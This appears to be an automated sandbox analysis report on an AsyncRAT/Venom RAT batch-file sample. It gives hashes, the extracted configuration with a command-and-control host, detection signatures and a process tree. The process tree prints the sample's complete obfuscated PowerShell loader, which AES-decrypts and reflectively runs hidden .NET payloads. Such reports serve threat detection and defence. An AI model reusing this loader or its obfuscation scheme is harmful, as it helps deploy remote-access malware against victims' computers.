asyncrat | f0e5b0472df1921c5b9c32c0dc4c1a3a2cc15084b72df00fe2710f63221ee224

Analysis

max time kernel
129s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2024 03:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows.cmd
Size

66KB
MD5

3a56f31eda19041d7ea9aeab089847eb
SHA1

1ca9985ab27390bdd710c5f6d09af344b69ed56b
SHA256

562cc7b2b867668ff252095a3bb3dc0641428fddd6ea23cfca475541fc10cbf9
SHA512

1c633d473ed3ac06acfb06f012e5c7e0dc8402b8bba9680a4b97fe5282a5f8614331b2bed6132fa4d583f67022aa5ef0a7b96774cda94861c396be2250d149ca
SSDEEP

1536:gElMViXyqGaO24iKbBG6IV3VvhRvRt/rCwIK4GfFjR:gn71aO24FdG6INVvhRptTCSNFjR

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

kdfsv.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral16/memory/3376-32-0x0000020040BC0000-0x0000020040BD6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

42 3376 powershell.exe
43 3376 powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3376 powershell.exe
3376 powershell.exe
4476 powershell.exe
4476 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3376 powershell.exe
Token: SeDebugPrivilege 4476 powershell.exe

flow	pid	process
42	3376	powershell.exe
43	3376	powershell.exe

pid	process
3376	powershell.exe
3376	powershell.exe
4476	powershell.exe
4476	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.execmd.exepowershell.exe

description	pid	process	target process
PID 2952 wrote to memory of 2540	2952	cmd.exe	cmd.exe
PID 2952 wrote to memory of 2540	2952	cmd.exe	cmd.exe
PID 2540 wrote to memory of 4820	2540	cmd.exe	cmd.exe
PID 2540 wrote to memory of 4820	2540	cmd.exe	cmd.exe
PID 2540 wrote to memory of 3376	2540	cmd.exe	powershell.exe
PID 2540 wrote to memory of 3376	2540	cmd.exe	powershell.exe
PID 3376 wrote to memory of 4476	3376	powershell.exe	powershell.exe
PID 3376 wrote to memory of 4476	3376	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';$WLJw='InCvYLvCvYLokCvYLeCvYL'.Replace('CvYL', ''),'TGQJMraGQJMnsfGQJMormGQJMFinGQJMaGQJMlGQJMBGQJMloGQJMckGQJM'.Replace('GQJM', ''),'SplSyGditSyGd'.Replace('SyGd', ''),'ElwKIbemwKIbewKIbntAwKIbtwKIb'.Replace('wKIb', ''),'LoaLqPaaLqPdaLqP'.Replace('aLqP', ''),'GeZtXeeZtXteZtXCueZtXrreeZtXneZtXtPreZtXoeZtXceseZtXseZtX'.Replace('eZtX', ''),'EntPkLTryPPkLToinPkLTtPkLT'.Replace('PkLT', ''),'CKpdDopyKpdDToKpdD'.Replace('KpdD', ''),'ReeqVLadLeqVLieqVLneeqVLseqVL'.Replace('eqVL', ''),'DdbPkecdbPkompdbPkrdbPkessdbPk'.Replace('dbPk', ''),'CLyDOreaLyDOteLyDODeLyDOcryLyDOpLyDOtLyDOorLyDO'.Replace('LyDO', ''),'FIaBCroIaBCmBaIaBCsIaBCe64IaBCStIaBCrIaBCinIaBCgIaBC'.Replace('IaBC', ''),'MIJoCaIJoCinIJoCMIJoCoduIJoCleIJoC'.Replace('IJoC', ''),'ChaQjVanaQjVgaQjVeaQjVExtaQjVensaQjVioaQjVnaQjV'.Replace('aQjV', '');powershell -w hidden;function ImYLZ($JnwiD){$XxYKa=[System.Security.Cryptography.Aes]::Create();$XxYKa.Mode=[System.Security.Cryptography.CipherMode]::CBC;$XxYKa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$XxYKa.Key=[System.Convert]::($WLJw[11])('T0dKGXhcNl1TXEBdsATQZk5fcZVOR6MRYQ0653LUp+o=');$XxYKa.IV=[System.Convert]::($WLJw[11])('Z5oBwCXIC4JH125OsE/9wg==');$iuKeX=$XxYKa.($WLJw[10])();$zSovn=$iuKeX.($WLJw[1])($JnwiD,0,$JnwiD.Length);$iuKeX.Dispose();$XxYKa.Dispose();$zSovn;}function pYWXC($JnwiD){$EfKAz=New-Object System.IO.MemoryStream(,$JnwiD);$wKBJr=New-Object System.IO.MemoryStream;$NjZtV=New-Object System.IO.Compression.GZipStream($EfKAz,[IO.Compression.CompressionMode]::($WLJw[9]));$NjZtV.($WLJw[7])($wKBJr);$NjZtV.Dispose();$EfKAz.Dispose();$wKBJr.Dispose();$wKBJr.ToArray();}$lxWGc=[System.IO.File]::($WLJw[8])([Console]::Title);$hbekG=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 5).Substring(2))));$FPrZl=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 6).Substring(2))));[System.Reflection.Assembly]::($WLJw[4])([byte[]]$FPrZl).($WLJw[6]).($WLJw[0])($null,$null);[System.Reflection.Assembly]::($WLJw[4])([byte[]]$hbekG).($WLJw[6]).($WLJw[0])($null,$null); "
3⤵
PID:4820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4gxsiiv.hsu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3376-31-0x0000020040BB0000-0x0000020040BC0000-memory.dmp

Filesize
64KB

Download
memory/3376-33-0x00007FFE1A130000-0x00007FFE1A325000-memory.dmp

Filesize
2.0MB

Download
memory/3376-29-0x00007FFE1A130000-0x00007FFE1A325000-memory.dmp

Filesize
2.0MB

Download
memory/3376-30-0x00007FFE19320000-0x00007FFE193DE000-memory.dmp

Filesize
760KB

Download
memory/3376-13-0x0000020040CC0000-0x0000020040D36000-memory.dmp

Filesize
472KB

Download
memory/3376-28-0x0000020040BA0000-0x0000020040BAA000-memory.dmp

Filesize
40KB

Download
memory/3376-39-0x000002003E7D0000-0x000002003E7E0000-memory.dmp

Filesize
64KB

Download
memory/3376-37-0x00007FFDFB720000-0x00007FFDFC1E1000-memory.dmp

Filesize
10.8MB

Download
memory/3376-40-0x00007FFE1A130000-0x00007FFE1A325000-memory.dmp

Filesize
2.0MB

Download
memory/3376-5-0x00000200261F0000-0x0000020026212000-memory.dmp

Filesize
136KB

Download
memory/3376-12-0x0000020040BF0000-0x0000020040C34000-memory.dmp

Filesize
272KB

Download
memory/3376-8-0x000002003E7D0000-0x000002003E7E0000-memory.dmp

Filesize
64KB

Download
memory/3376-32-0x0000020040BC0000-0x0000020040BD6000-memory.dmp

Filesize
88KB

Download
memory/3376-6-0x00007FFDFB720000-0x00007FFDFC1E1000-memory.dmp

Filesize
10.8MB

Download
memory/3376-36-0x00007FFE0A620000-0x00007FFE0A639000-memory.dmp

Filesize
100KB

Download
memory/4476-27-0x00007FFDFB720000-0x00007FFDFC1E1000-memory.dmp

Filesize
10.8MB

Download
memory/4476-24-0x000002914D0E0000-0x000002914D0F0000-memory.dmp

Filesize
64KB

Download
memory/4476-23-0x00007FFDFB720000-0x00007FFDFC1E1000-memory.dmp

Filesize
10.8MB

Download